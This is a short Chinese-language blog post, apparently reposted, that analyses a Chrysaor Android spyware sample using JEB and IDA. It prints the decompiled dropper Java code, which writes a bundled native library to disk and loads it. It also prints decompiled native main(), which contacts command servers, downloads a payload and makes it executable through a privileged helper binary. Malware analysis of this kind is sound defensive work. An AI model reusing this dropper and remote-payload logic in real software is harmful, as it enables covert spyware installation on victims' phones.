android malware

来源：互联网发布：苏州app软件开发编辑：程序博客网时间：2024/05/23 01:23

来源：
https://github.com/fs0c131y/Android-Malwares/tree/c897dff1796c9cb7f19104e9ce3546d54cd55a45/Chrysaor/

3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86

用JEB看是这样一个结构
先看manifest发现用到了超多权限，然后入口是这里
这里写图片描述

反编译得到其Java代码

package com.network.android;import android.app.Activity;import android.os.Bundle;import java.io.ByteArrayOutputStream;import java.io.FileOutputStream;import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;public class NetworkMain extends Activity {    public NetworkMain() {        super();    }    protected void onCreate(Bundle arg8) {        super.onCreate(arg8);        String v2 = "/data/data/com.network.android/libsgn.so";        try {            InputStream v1 = this.getResources().getAssets().open("libsgn.so");            byte[] v0 = new byte[v1.available()];            v1.read(v0);            ByteArrayOutputStream v3 = new ByteArrayOutputStream();            v3.write(v0);            v3.close();            v1.close();            FileOutputStream v4 = new FileOutputStream(v2);            v3.writeTo(((OutputStream)v4));            ((OutputStream)v4).close();            System.load(v2);        }        catch(Throwable v5) {        }        catch(Exception v5_1) {        }        catch(IOException v5_2) {        }        this.finish();    }}

发现并没有界面，直接将assets目录下的.so写入android的这个路径
/data/data/com.network.android/libsgn.so，然后用

Syste.load()

加载.so，然后就得转战IDA了。
然而并不会分析，只能看一堆strings
这里写图片描述
哦对了可以看一下JNI_onLoad()

发现它调用了fork()然后main()!
看到main的代码很牛啊，然而很多不懂的函数

int __cdecl __noreturn main(int argc, const char **argv, const char **envp){  void *v3; // r0@1  int v4; // r5@2  int v5; // r7@6  void *v6; // r5@7  char *v7; // r0@12  const char *v8; // r2@12  const char *v9; // r3@12  char *v10; // [sp+0h] [bp-4A0h]@0  char *v11; // [sp+4h] [bp-49Ch]@0  int v12; // [sp+Ch] [bp-494h]@7  char *v13; // [sp+10h] [bp-490h]@7  int v14; // [sp+1Ch] [bp-484h]@1  int v15; // [sp+20h] [bp-480h]@1  void *ptr; // [sp+24h] [bp-47Ch]@1  int v17; // [sp+28h] [bp-478h]@7  char v18; // [sp+2Ch] [bp-474h]@1  char v19; // [sp+3Ch] [bp-464h]@1  char v20; // [sp+60h] [bp-440h]@1  char s; // [sp+84h] [bp-41Ch]@1  int v22; // [sp+484h] [bp-1Ch]@1  v14 = 0;  v15 = 0;  v22 = _stack_chk_guard;  ptr = 0;  memset(&s, 0, 0x400u);  memset(&v19, 0, 0x21u);  memset(&v18, 0, 0xDu);  v3 = memset(&v20, 0, 0x21u);  handle_signals(v3);  g_sleep_time_in_seconds = 30;  sleep(0x1Eu);  geteuid();  while ( 1 )  {    v4 = 0;    if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )    {      get_random_hexlified_md5(&v19);      get_mac_address(&v18);      get_hexlified_md5(&v18, &v20, 12);      if ( http_send_request_with_get(&v20, &v19, SERVERS, v14) == 1 && http_receive_payload(v14, &ptr, &v15) == 1 )      {        socket_disconnect(&v14);        if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )        {          v5 = v15;          v4 = 1;          if ( v15 > 0 )          {            v12 = v14;            v6 = ptr;            v13 = SERVERS;            v17 = 0;            if ( file_exists("/system/csk", &v17) != 1 )              goto LABEL_17;            if ( v17 )            {              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1                || system("/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\"") == -1                || system("/system/csk \"chmod 711 /mnt/obb/.coldboot_init\"") == -1 )              {LABEL_17:                v4 = 0;                goto LABEL_18;              }              unlink("/data/data/com.network.android/.coldboot_init");              v7 = &s;              v8 = "%s";              v9 = "/mnt/obb/.coldboot_init";            }            else            {              if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 )                goto LABEL_17;              v7 = &s;              v8 = "%s";              v9 = "/data/data/com.network.android/.coldboot_init";            }            if ( snprintf(v7, 0x3FFu, v8, v9, v10, v11) <= 0 )              goto LABEL_17;            v10 = &v19;            v11 = v13;            v4 = sub_1CF4(v12, &s, v17, &v20);            if ( v4 != 1 )              goto LABEL_17;          }        }      }    }LABEL_18:    if ( ptr )    {      free(ptr);      ptr = 0;    }    socket_disconnect(&v14);    if ( v4 == 1 )      pthread_exit(0);    sleep(g_sleep_time_in_seconds);  }}

阅读全文

0 0